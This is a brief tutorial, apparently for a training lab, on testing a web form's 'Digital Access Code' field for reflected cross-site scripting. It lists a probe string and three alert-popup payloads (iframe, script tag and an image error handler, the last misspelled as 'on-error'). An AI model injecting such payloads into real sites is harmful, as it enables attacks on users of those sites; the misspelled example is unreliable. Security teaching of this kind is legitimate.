XSS - Reflected XSS Attacks

Goal: 

Use a vulnerability on the Digital Access Code entry field to inject script to start XSS attack. 

Method: 

One of the most effective way to validate if the site or webform is vulnerable for XSS, you can use below

!@#$<XSS>[]()'"

You can see response from the server shown

1. Just enter script below and click purchase, 

<IFRAME SRC="javascript:alert('Reflected XSS by windowspeople');"></IFRAME>

Or 

 <script>alert('Reflected XSS by windowspeople')</script>

 

<img src='x:x' on-error=alert('xss_test')>

 

2. XSS script started and pop up window. 

 

 

Please publish modules in offcanvas position.